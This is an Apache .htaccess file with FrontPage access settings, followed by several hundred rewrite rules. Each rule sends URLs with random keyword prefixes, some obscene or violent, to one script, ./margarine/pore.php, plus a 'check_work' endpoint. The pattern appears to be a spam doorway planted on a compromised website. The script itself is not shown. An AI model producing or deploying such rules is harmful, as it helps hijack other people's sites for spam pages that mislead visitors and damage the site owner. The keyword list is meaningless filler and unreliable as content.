# -FrontPage-

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
AuthName ujaro.com
AuthUserFile /home/dogodea1/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/dogodea1/public_html/_vti_pvt/service.grp

RewriteEngine on
RewriteRule check_work/$ ./margarine/pore.php?checkwork
RewriteRule margarine-(.*)/$ ./margarine/pore.php?$1
RewriteRule pore-(.*)/$ ./margarine/pore.php?$1
RewriteRule nymph-(.*)/$ ./margarine/pore.php?$1
RewriteRule liters-(.*)/$ ./margarine/pore.php?$1
RewriteRule vasectomy-(.*)/$ ./margarine/pore.php?$1
RewriteRule grimace-(.*)/$ ./margarine/pore.php?$1
RewriteRule collages-(.*)/$ ./margarine/pore.php?$1
RewriteRule esate-(.*)/$ ./margarine/pore.php?$1
RewriteRule allowed-(.*)/$ ./margarine/pore.php?$1
RewriteRule fod-(.*)/$ ./margarine/pore.php?$1
RewriteRule feeds-(.*)/$ ./margarine/pore.php?$1
RewriteRule andromeda-(.*)/$ ./margarine/pore.php?$1
RewriteRule bastrop-(.*)/$ ./margarine/pore.php?$1
RewriteRule flite-(.*)/$ ./margarine/pore.php?$1
RewriteRule delivered-(.*)/$ ./margarine/pore.php?$1
RewriteRule cary-(.*)/$ ./margarine/pore.php?$1
RewriteRule bea-(.*)/$ ./margarine/pore.php?$1
RewriteRule pilla-(.*)/$ ./margarine/pore.php?$1
RewriteRule seismograph-(.*)/$ ./margarine/pore.php?$1
RewriteRule distillation-(.*)/$ ./margarine/pore.php?$1
RewriteRule effective-(.*)/$ ./margarine/pore.php?$1
RewriteRule dialect-(.*)/$ ./margarine/pore.php?$1
RewriteRule dorada-(.*)/$ ./margarine/pore.php?$1
RewriteRule lenard-(.*)/$ ./margarine/pore.php?$1
RewriteRule warnock-(.*)/$ ./margarine/pore.php?$1
RewriteRule cubase-(.*)/$ ./margarine/pore.php?$1
RewriteRule vinny-(.*)/$ ./margarine/pore.php?$1
RewriteRule bastes-(.*)/$ ./margarine/pore.php?$1
RewriteRule inclination-(.*)/$ ./margarine/pore.php?$1
RewriteRule clamps-(.*)/$ ./margarine/pore.php?$1
RewriteRule cyclones-(.*)/$ ./margarine/pore.php?$1
RewriteRule incarceration-(.*)/$ ./margarine/pore.php?$1
RewriteRule keener-(.*)/$ ./margarine/pore.php?$1
RewriteRule mat-(.*)/$ ./margarine/pore.php?$1
RewriteRule nox-(.*)/$ ./margarine/pore.php?$1
RewriteRule web-(.*)/$ ./margarine/pore.php?$1
RewriteRule nao-(.*)/$ ./margarine/pore.php?$1
RewriteRule skunk-(.*)/$ ./margarine/pore.php?$1
RewriteRule rug-(.*)/$ ./margarine/pore.php?$1
RewriteRule wga-(.*)/$ ./margarine/pore.php?$1
RewriteRule betrayal-(.*)/$ ./margarine/pore.php?$1
RewriteRule part-(.*)/$ ./margarine/pore.php?$1
RewriteRule donor-(.*)/$ ./margarine/pore.php?$1
RewriteRule allergies-(.*)/$ ./margarine/pore.php?$1
RewriteRule invent-(.*)/$ ./margarine/pore.php?$1
RewriteRule optometrist-(.*)/$ ./margarine/pore.php?$1
RewriteRule substitutes-(.*)/$ ./margarine/pore.php?$1
RewriteRule soft-(.*)/$ ./margarine/pore.php?$1
RewriteRule notre-(.*)/$ ./margarine/pore.php?$1
RewriteRule associates-(.*)/$ ./margarine/pore.php?$1
RewriteRule hmc-(.*)/$ ./margarine/pore.php?$1
RewriteRule accelerometer-(.*)/$ ./margarine/pore.php?$1
RewriteRule dignity-(.*)/$ ./margarine/pore.php?$1
RewriteRule pleat-(.*)/$ ./margarine/pore.php?$1
RewriteRule woodbridge-(.*)/$ ./margarine/pore.php?$1
RewriteRule caterpillar-(.*)/$ ./margarine/pore.php?$1
RewriteRule savage-(.*)/$ ./margarine/pore.php?$1
RewriteRule Claremont-(.*)/$ ./margarine/pore.php?$1
RewriteRule galleria-(.*)/$ ./margarine/pore.php?$1
RewriteRule caverns-(.*)/$ ./margarine/pore.php?$1
RewriteRule ars-(.*)/$ ./margarine/pore.php?$1
RewriteRule disclosure-(.*)/$ ./margarine/pore.php?$1
RewriteRule eskimos-(.*)/$ ./margarine/pore.php?$1
RewriteRule ursula-(.*)/$ ./margarine/pore.php?$1
RewriteRule cubic-(.*)/$ ./margarine/pore.php?$1
RewriteRule fairfield-(.*)/$ ./margarine/pore.php?$1
RewriteRule hollows-(.*)/$ ./margarine/pore.php?$1
RewriteRule Virgo-(.*)/$ ./margarine/pore.php?$1
RewriteRule bianca-(.*)/$ ./margarine/pore.php?$1
RewriteRule selleck-(.*)/$ ./margarine/pore.php?$1
RewriteRule stowe-(.*)/$ ./margarine/pore.php?$1
RewriteRule blackcomb-(.*)/$ ./margarine/pore.php?$1
RewriteRule recliners-(.*)/$ ./margarine/pore.php?$1
RewriteRule entirety-(.*)/$ ./margarine/pore.php?$1
RewriteRule maroon-(.*)/$ ./margarine/pore.php?$1
RewriteRule streak-(.*)/$ ./margarine/pore.php?$1
RewriteRule drunken-(.*)/$ ./margarine/pore.php?$1
RewriteRule repellant-(.*)/$ ./margarine/pore.php?$1
RewriteRule bonito-(.*)/$ ./margarine/pore.php?$1
RewriteRule tarantino-(.*)/$ ./margarine/pore.php?$1
RewriteRule windscreen-(.*)/$ ./margarine/pore.php?$1
RewriteRule il-(.*)/$ ./margarine/pore.php?$1
RewriteRule stone-(.*)/$ ./margarine/pore.php?$1
RewriteRule brisas-(.*)/$ ./margarine/pore.php?$1
RewriteRule immortal-(.*)/$ ./margarine/pore.php?$1
RewriteRule hydraulics-(.*)/$ ./margarine/pore.php?$1
RewriteRule peek-(.*)/$ ./margarine/pore.php?$1
RewriteRule jumeirah-(.*)/$ ./margarine/pore.php?$1
RewriteRule copies-(.*)/$ ./margarine/pore.php?$1
RewriteRule ife-(.*)/$ ./margarine/pore.php?$1
RewriteRule conducive-(.*)/$ ./margarine/pore.php?$1
RewriteRule mikey-(.*)/$ ./margarine/pore.php?$1
RewriteRule hosts-(.*)/$ ./margarine/pore.php?$1
RewriteRule Bombay-(.*)/$ ./margarine/pore.php?$1
RewriteRule physic-(.*)/$ ./margarine/pore.php?$1
RewriteRule buttercream-(.*)/$ ./margarine/pore.php?$1
RewriteRule strangling-(.*)/$ ./margarine/pore.php?$1
RewriteRule puffin-(.*)/$ ./margarine/pore.php?$1
RewriteRule boob-(.*)/$ ./margarine/pore.php?$1
RewriteRule volcanos-(.*)/$ ./margarine/pore.php?$1
RewriteRule transition-(.*)/$ ./margarine/pore.php?$1
RewriteRule armband-(.*)/$ ./margarine/pore.php?$1
RewriteRule greater-(.*)/$ ./margarine/pore.php?$1
RewriteRule reversing-(.*)/$ ./margarine/pore.php?$1
RewriteRule denseness-(.*)/$ ./margarine/pore.php?$1
RewriteRule libby-(.*)/$ ./margarine/pore.php?$1
RewriteRule rubik-(.*)/$ ./margarine/pore.php?$1
RewriteRule ekg-(.*)/$ ./margarine/pore.php?$1
RewriteRule fox-(.*)/$ ./margarine/pore.php?$1
RewriteRule eastwood-(.*)/$ ./margarine/pore.php?$1
RewriteRule qs-(.*)/$ ./margarine/pore.php?$1
RewriteRule Dmitri-(.*)/$ ./margarine/pore.php?$1
RewriteRule danial-(.*)/$ ./margarine/pore.php?$1
RewriteRule blck-(.*)/$ ./margarine/pore.php?$1
RewriteRule naturalism-(.*)/$ ./margarine/pore.php?$1
RewriteRule plunged-(.*)/$ ./margarine/pore.php?$1
RewriteRule ooh-(.*)/$ ./margarine/pore.php?$1
RewriteRule eprom-(.*)/$ ./margarine/pore.php?$1
RewriteRule emergencies-(.*)/$ ./margarine/pore.php?$1
RewriteRule bomber-(.*)/$ ./margarine/pore.php?$1
RewriteRule usn-(.*)/$ ./margarine/pore.php?$1
RewriteRule cat-(.*)/$ ./margarine/pore.php?$1
RewriteRule williamston-(.*)/$ ./margarine/pore.php?$1
RewriteRule mamaroneck-(.*)/$ ./margarine/pore.php?$1
RewriteRule interstitial-(.*)/$ ./margarine/pore.php?$1
RewriteRule Tanganyika-(.*)/$ ./margarine/pore.php?$1
RewriteRule bs-(.*)/$ ./margarine/pore.php?$1
RewriteRule camaro-(.*)/$ ./margarine/pore.php?$1
RewriteRule trillionth-(.*)/$ ./margarine/pore.php?$1
RewriteRule zionsville-(.*)/$ ./margarine/pore.php?$1
RewriteRule inhale-(.*)/$ ./margarine/pore.php?$1
RewriteRule sex-(.*)/$ ./margarine/pore.php?$1
RewriteRule laine-(.*)/$ ./margarine/pore.php?$1
RewriteRule metaphysics-(.*)/$ ./margarine/pore.php?$1
RewriteRule Kate-(.*)/$ ./margarine/pore.php?$1
RewriteRule sneed-(.*)/$ ./margarine/pore.php?$1
RewriteRule drucker-(.*)/$ ./margarine/pore.php?$1
RewriteRule ramones-(.*)/$ ./margarine/pore.php?$1
RewriteRule sweeden-(.*)/$ ./margarine/pore.php?$1
RewriteRule casas-(.*)/$ ./margarine/pore.php?$1
RewriteRule stewarts-(.*)/$ ./margarine/pore.php?$1
RewriteRule campings-(.*)/$ ./margarine/pore.php?$1
RewriteRule magna-(.*)/$ ./margarine/pore.php?$1
RewriteRule eddie-(.*)/$ ./margarine/pore.php?$1
RewriteRule fluffy-(.*)/$ ./margarine/pore.php?$1
RewriteRule tram-(.*)/$ ./margarine/pore.php?$1
RewriteRule ys-(.*)/$ ./margarine/pore.php?$1
RewriteRule salamanca-(.*)/$ ./margarine/pore.php?$1
RewriteRule fosters-(.*)/$ ./margarine/pore.php?$1
RewriteRule educacion-(.*)/$ ./margarine/pore.php?$1
RewriteRule abolition-(.*)/$ ./margarine/pore.php?$1
RewriteRule gardening-(.*)/$ ./margarine/pore.php?$1
RewriteRule mediating-(.*)/$ ./margarine/pore.php?$1
RewriteRule timeout-(.*)/$ ./margarine/pore.php?$1
RewriteRule single-(.*)/$ ./margarine/pore.php?$1
RewriteRule garters-(.*)/$ ./margarine/pore.php?$1
RewriteRule react-(.*)/$ ./margarine/pore.php?$1
RewriteRule salvia-(.*)/$ ./margarine/pore.php?$1
RewriteRule cas-(.*)/$ ./margarine/pore.php?$1
RewriteRule disagrees-(.*)/$ ./margarine/pore.php?$1
RewriteRule tosh-(.*)/$ ./margarine/pore.php?$1
RewriteRule ODonnell-(.*)/$ ./margarine/pore.php?$1
RewriteRule mcgrath-(.*)/$ ./margarine/pore.php?$1
RewriteRule dough-(.*)/$ ./margarine/pore.php?$1
RewriteRule matchstick-(.*)/$ ./margarine/pore.php?$1
RewriteRule travellers-(.*)/$ ./margarine/pore.php?$1
RewriteRule i860-(.*)/$ ./margarine/pore.php?$1
RewriteRule margate-(.*)/$ ./margarine/pore.php?$1
RewriteRule territorial-(.*)/$ ./margarine/pore.php?$1
RewriteRule lords-(.*)/$ ./margarine/pore.php?$1
RewriteRule unhealthy-(.*)/$ ./margarine/pore.php?$1
RewriteRule lesbo-(.*)/$ ./margarine/pore.php?$1
RewriteRule wipers-(.*)/$ ./margarine/pore.php?$1
RewriteRule wap-(.*)/$ ./margarine/pore.php?$1
RewriteRule coolpix-(.*)/$ ./margarine/pore.php?$1
RewriteRule psychopath-(.*)/$ ./margarine/pore.php?$1
RewriteRule cbs-(.*)/$ ./margarine/pore.php?$1
RewriteRule ozawa-(.*)/$ ./margarine/pore.php?$1
RewriteRule sm-(.*)/$ ./margarine/pore.php?$1
RewriteRule ji-(.*)/$ ./margarine/pore.php?$1
RewriteRule photographic-(.*)/$ ./margarine/pore.php?$1
RewriteRule crumb-(.*)/$ ./margarine/pore.php?$1
RewriteRule purchase-(.*)/$ ./margarine/pore.php?$1
RewriteRule luce-(.*)/$ ./margarine/pore.php?$1
RewriteRule miscellaneous-(.*)/$ ./margarine/pore.php?$1
RewriteRule Parisianizations-(.*)/$ ./margarine/pore.php?$1
RewriteRule seton-(.*)/$ ./margarine/pore.php?$1
RewriteRule thefts-(.*)/$ ./margarine/pore.php?$1
RewriteRule nonlocal-(.*)/$ ./margarine/pore.php?$1
RewriteRule sprague-(.*)/$ ./margarine/pore.php?$1
RewriteRule barron-(.*)/$ ./margarine/pore.php?$1
RewriteRule surety-(.*)/$ ./margarine/pore.php?$1
RewriteRule maxim-(.*)/$ ./margarine/pore.php?$1
RewriteRule chocobo-(.*)/$ ./margarine/pore.php?$1
RewriteRule hylton-(.*)/$ ./margarine/pore.php?$1
RewriteRule stickier-(.*)/$ ./margarine/pore.php?$1
RewriteRule fifteen-(.*)/$ ./margarine/pore.php?$1
RewriteRule carve-(.*)/$ ./margarine/pore.php?$1
RewriteRule caddie-(.*)/$ ./margarine/pore.php?$1
RewriteRule redness-(.*)/$ ./margarine/pore.php?$1
RewriteRule wondrously-(.*)/$ ./margarine/pore.php?$1
RewriteRule frat-(.*)/$ ./margarine/pore.php?$1
RewriteRule rollup-(.*)/$ ./margarine/pore.php?$1
RewriteRule cashflow-(.*)/$ ./margarine/pore.php?$1
RewriteRule wrangler-(.*)/$ ./margarine/pore.php?$1
RewriteRule enamel-(.*)/$ ./margarine/pore.php?$1
RewriteRule lauder-(.*)/$ ./margarine/pore.php?$1
RewriteRule furnace-(.*)/$ ./margarine/pore.php?$1
RewriteRule laminectomy-(.*)/$ ./margarine/pore.php?$1
RewriteRule dss-(.*)/$ ./margarine/pore.php?$1
RewriteRule sherwood-(.*)/$ ./margarine/pore.php?$1
RewriteRule beaty-(.*)/$ ./margarine/pore.php?$1
RewriteRule thatches-(.*)/$ ./margarine/pore.php?$1
RewriteRule sore-(.*)/$ ./margarine/pore.php?$1
RewriteRule shawna-(.*)/$ ./margarine/pore.php?$1
RewriteRule motives-(.*)/$ ./margarine/pore.php?$1
RewriteRule designing-(.*)/$ ./margarine/pore.php?$1
RewriteRule unravels-(.*)/$ ./margarine/pore.php?$1
RewriteRule cellularone-(.*)/$ ./margarine/pore.php?$1
RewriteRule eldora-(.*)/$ ./margarine/pore.php?$1
RewriteRule gwar-(.*)/$ ./margarine/pore.php?$1
RewriteRule hairstylist-(.*)/$ ./margarine/pore.php?$1
RewriteRule snowball-(.*)/$ ./margarine/pore.php?$1
RewriteRule landlords-(.*)/$ ./margarine/pore.php?$1
RewriteRule neuro-(.*)/$ ./margarine/pore.php?$1
RewriteRule guages-(.*)/$ ./margarine/pore.php?$1
RewriteRule assertive-(.*)/$ ./margarine/pore.php?$1
RewriteRule cam-(.*)/$ ./margarine/pore.php?$1
RewriteRule epidemiology-(.*)/$ ./margarine/pore.php?$1
RewriteRule revocable-(.*)/$ ./margarine/pore.php?$1
RewriteRule quoting-(.*)/$ ./margarine/pore.php?$1
RewriteRule ds-(.*)/$ ./margarine/pore.php?$1
RewriteRule ives-(.*)/$ ./margarine/pore.php?$1
RewriteRule inroad-(.*)/$ ./margarine/pore.php?$1
RewriteRule feb-(.*)/$ ./margarine/pore.php?$1
RewriteRule apts-(.*)/$ ./margarine/pore.php?$1
RewriteRule daisey-(.*)/$ ./margarine/pore.php?$1
RewriteRule romeoville-(.*)/$ ./margarine/pore.php?$1
RewriteRule covalent-(.*)/$ ./margarine/pore.php?$1
RewriteRule fungal-(.*)/$ ./margarine/pore.php?$1
RewriteRule picc-(.*)/$ ./margarine/pore.php?$1
RewriteRule aurora-(.*)/$ ./margarine/pore.php?$1
RewriteRule gardened-(.*)/$ ./margarine/pore.php?$1
RewriteRule reproduce-(.*)/$ ./margarine/pore.php?$1
RewriteRule raping-(.*)/$ ./margarine/pore.php?$1
RewriteRule fuego-(.*)/$ ./margarine/pore.php?$1
RewriteRule v40-(.*)/$ ./margarine/pore.php?$1
RewriteRule deana-(.*)/$ ./margarine/pore.php?$1
RewriteRule sunrise-(.*)/$ ./margarine/pore.php?$1
RewriteRule conrad-(.*)/$ ./margarine/pore.php?$1
RewriteRule hushes-(.*)/$ ./margarine/pore.php?$1
RewriteRule surgical-(.*)/$ ./margarine/pore.php?$1
RewriteRule scallops-(.*)/$ ./margarine/pore.php?$1
RewriteRule wyse-(.*)/$ ./margarine/pore.php?$1
RewriteRule orton-(.*)/$ ./margarine/pore.php?$1
RewriteRule flesh-(.*)/$ ./margarine/pore.php?$1
RewriteRule cones-(.*)/$ ./margarine/pore.php?$1
RewriteRule traces-(.*)/$ ./margarine/pore.php?$1
RewriteRule impartially-(.*)/$ ./margarine/pore.php?$1
RewriteRule matrix-(.*)/$ ./margarine/pore.php?$1
RewriteRule hi5-(.*)/$ ./margarine/pore.php?$1
RewriteRule plea-(.*)/$ ./margarine/pore.php?$1
RewriteRule projects-(.*)/$ ./margarine/pore.php?$1
RewriteRule faxes-(.*)/$ ./margarine/pore.php?$1
RewriteRule down-(.*)/$ ./margarine/pore.php?$1
RewriteRule pagan-(.*)/$ ./margarine/pore.php?$1
RewriteRule flynt-(.*)/$ ./margarine/pore.php?$1
RewriteRule allexperts-(.*)/$ ./margarine/pore.php?$1
RewriteRule fleeces-(.*)/$ ./margarine/pore.php?$1
RewriteRule Bismarck-(.*)/$ ./margarine/pore.php?$1
RewriteRule neo-(.*)/$ ./margarine/pore.php?$1
RewriteRule thickness-(.*)/$ ./margarine/pore.php?$1
RewriteRule Boeing-(.*)/$ ./margarine/pore.php?$1
RewriteRule holt-(.*)/$ ./margarine/pore.php?$1
RewriteRule staph-(.*)/$ ./margarine/pore.php?$1
RewriteRule systemworks-(.*)/$ ./margarine/pore.php?$1
RewriteRule exmouth-(.*)/$ ./margarine/pore.php?$1
RewriteRule x6-(.*)/$ ./margarine/pore.php?$1
RewriteRule expressing-(.*)/$ ./margarine/pore.php?$1
RewriteRule throwers-(.*)/$ ./margarine/pore.php?$1
RewriteRule Cyrus-(.*)/$ ./margarine/pore.php?$1
RewriteRule achiever-(.*)/$ ./margarine/pore.php?$1
RewriteRule snowfall-(.*)/$ ./margarine/pore.php?$1
RewriteRule tingle-(.*)/$ ./margarine/pore.php?$1
RewriteRule martyr-(.*)/$ ./margarine/pore.php?$1
RewriteRule patented-(.*)/$ ./margarine/pore.php?$1
RewriteRule jackpot-(.*)/$ ./margarine/pore.php?$1
RewriteRule australians-(.*)/$ ./margarine/pore.php?$1
RewriteRule franc-(.*)/$ ./margarine/pore.php?$1
RewriteRule fule-(.*)/$ ./margarine/pore.php?$1
RewriteRule bitter-(.*)/$ ./margarine/pore.php?$1
RewriteRule puffy-(.*)/$ ./margarine/pore.php?$1
RewriteRule fontana-(.*)/$ ./margarine/pore.php?$1
RewriteRule defying-(.*)/$ ./margarine/pore.php?$1
RewriteRule promotions-(.*)/$ ./margarine/pore.php?$1
RewriteRule constellations-(.*)/$ ./margarine/pore.php?$1
RewriteRule vigo-(.*)/$ ./margarine/pore.php?$1
RewriteRule napier-(.*)/$ ./margarine/pore.php?$1
RewriteRule proficiently-(.*)/$ ./margarine/pore.php?$1
RewriteRule hobbies-(.*)/$ ./margarine/pore.php?$1
RewriteRule juggernaut-(.*)/$ ./margarine/pore.php?$1
RewriteRule davids-(.*)/$ ./margarine/pore.php?$1
RewriteRule diarrhea-(.*)/$ ./margarine/pore.php?$1
RewriteRule grinding-(.*)/$ ./margarine/pore.php?$1
RewriteRule lucero-(.*)/$ ./margarine/pore.php?$1
RewriteRule mdf-(.*)/$ ./margarine/pore.php?$1
RewriteRule hunters-(.*)/$ ./margarine/pore.php?$1
RewriteRule double-(.*)/$ ./margarine/pore.php?$1
RewriteRule corpse-(.*)/$ ./margarine/pore.php?$1
RewriteRule stedman-(.*)/$ ./margarine/pore.php?$1
RewriteRule lesion-(.*)/$ ./margarine/pore.php?$1
RewriteRule angelou-(.*)/$ ./margarine/pore.php?$1
RewriteRule c1-(.*)/$ ./margarine/pore.php?$1
RewriteRule pamphlets-(.*)/$ ./margarine/pore.php?$1
RewriteRule dahl-(.*)/$ ./margarine/pore.php?$1
RewriteRule somethin-(.*)/$ ./margarine/pore.php?$1
RewriteRule insertions-(.*)/$ ./margarine/pore.php?$1
RewriteRule troy-(.*)/$ ./margarine/pore.php?$1
RewriteRule yellow-(.*)/$ ./margarine/pore.php?$1
RewriteRule marston-(.*)/$ ./margarine/pore.php?$1
RewriteRule anointing-(.*)/$ ./margarine/pore.php?$1
RewriteRule paralegals-(.*)/$ ./margarine/pore.php?$1
RewriteRule exposer-(.*)/$ ./margarine/pore.php?$1
RewriteRule gow-(.*)/$ ./margarine/pore.php?$1
RewriteRule commitee-(.*)/$ ./margarine/pore.php?$1
RewriteRule bavaro-(.*)/$ ./margarine/pore.php?$1
RewriteRule molesters-(.*)/$ ./margarine/pore.php?$1
RewriteRule bagging-(.*)/$ ./margarine/pore.php?$1
RewriteRule emotion-(.*)/$ ./margarine/pore.php?$1
RewriteRule rikki-(.*)/$ ./margarine/pore.php?$1
RewriteRule zellers-(.*)/$ ./margarine/pore.php?$1
RewriteRule identical-(.*)/$ ./margarine/pore.php?$1
RewriteRule achat-(.*)/$ ./margarine/pore.php?$1
RewriteRule whiteman-(.*)/$ ./margarine/pore.php?$1
RewriteRule mc-(.*)/$ ./margarine/pore.php?$1
RewriteRule soviet-(.*)/$ ./margarine/pore.php?$1
RewriteRule manowar-(.*)/$ ./margarine/pore.php?$1
RewriteRule existing-(.*)/$ ./margarine/pore.php?$1
RewriteRule fugitive-(.*)/$ ./margarine/pore.php?$1
RewriteRule scientist-(.*)/$ ./margarine/pore.php?$1
RewriteRule employable-(.*)/$ ./margarine/pore.php?$1
RewriteRule md5-(.*)/$ ./margarine/pore.php?$1
RewriteRule abington-(.*)/$ ./margarine/pore.php?$1
RewriteRule albert-(.*)/$ ./margarine/pore.php?$1
RewriteRule asterix-(.*)/$ ./margarine/pore.php?$1
RewriteRule expected-(.*)/$ ./margarine/pore.php?$1
RewriteRule wallpapers-(.*)/$ ./margarine/pore.php?$1
RewriteRule burr-(.*)/$ ./margarine/pore.php?$1
RewriteRule pep-(.*)/$ ./margarine/pore.php?$1
RewriteRule lullabye-(.*)/$ ./margarine/pore.php?$1
RewriteRule lever-(.*)/$ ./margarine/pore.php?$1
RewriteRule nora-(.*)/$ ./margarine/pore.php?$1
RewriteRule tastes-(.*)/$ ./margarine/pore.php?$1
RewriteRule angers-(.*)/$ ./margarine/pore.php?$1
RewriteRule mangrove-(.*)/$ ./margarine/pore.php?$1
RewriteRule krall-(.*)/$ ./margarine/pore.php?$1
RewriteRule pederson-(.*)/$ ./margarine/pore.php?$1
RewriteRule hierarchy-(.*)/$ ./margarine/pore.php?$1
RewriteRule scarecrow-(.*)/$ ./margarine/pore.php?$1
RewriteRule minivan-(.*)/$ ./margarine/pore.php?$1
RewriteRule mcguire-(.*)/$ ./margarine/pore.php?$1
RewriteRule shrm-(.*)/$ ./margarine/pore.php?$1
RewriteRule famliy-(.*)/$ ./margarine/pore.php?$1
RewriteRule basements-(.*)/$ ./margarine/pore.php?$1
RewriteRule moron-(.*)/$ ./margarine/pore.php?$1
RewriteRule trickster-(.*)/$ ./margarine/pore.php?$1
RewriteRule caledonia-(.*)/$ ./margarine/pore.php?$1
RewriteRule trafalgar-(.*)/$ ./margarine/pore.php?$1
RewriteRule catastrophe-(.*)/$ ./margarine/pore.php?$1
RewriteRule steroid-(.*)/$ ./margarine/pore.php?$1
RewriteRule illustration-(.*)/$ ./margarine/pore.php?$1
RewriteRule mercenaries-(.*)/$ ./margarine/pore.php?$1
RewriteRule inflight-(.*)/$ ./margarine/pore.php?$1
RewriteRule enviroment-(.*)/$ ./margarine/pore.php?$1
RewriteRule opeth-(.*)/$ ./margarine/pore.php?$1
RewriteRule prone-(.*)/$ ./margarine/pore.php?$1
RewriteRule slideshow-(.*)/$ ./margarine/pore.php?$1
RewriteRule shoplifting-(.*)/$ ./margarine/pore.php?$1
RewriteRule fushigi-(.*)/$ ./margarine/pore.php?$1
RewriteRule bloomsbury-(.*)/$ ./margarine/pore.php?$1
RewriteRule bath-(.*)/$ ./margarine/pore.php?$1
RewriteRule poured-(.*)/$ ./margarine/pore.php?$1
RewriteRule virgen-(.*)/$ ./margarine/pore.php?$1
RewriteRule lockbox-(.*)/$ ./margarine/pore.php?$1
RewriteRule smu-(.*)/$ ./margarine/pore.php?$1
RewriteRule avent-(.*)/$ ./margarine/pore.php?$1
RewriteRule redlight-(.*)/$ ./margarine/pore.php?$1
RewriteRule homepages-(.*)/$ ./margarine/pore.php?$1
RewriteRule hamstring-(.*)/$ ./margarine/pore.php?$1
RewriteRule linsay-(.*)/$ ./margarine/pore.php?$1
RewriteRule limiter-(.*)/$ ./margarine/pore.php?$1
RewriteRule permit-(.*)/$ ./margarine/pore.php?$1
RewriteRule garcia-(.*)/$ ./margarine/pore.php?$1
RewriteRule mclane-(.*)/$ ./margarine/pore.php?$1
RewriteRule kenda-(.*)/$ ./margarine/pore.php?$1
RewriteRule arranging-(.*)/$ ./margarine/pore.php?$1
RewriteRule stallions-(.*)/$ ./margarine/pore.php?$1
RewriteRule california-(.*)/$ ./margarine/pore.php?$1
RewriteRule camille-(.*)/$ ./margarine/pore.php?$1
RewriteRule antony-(.*)/$ ./margarine/pore.php?$1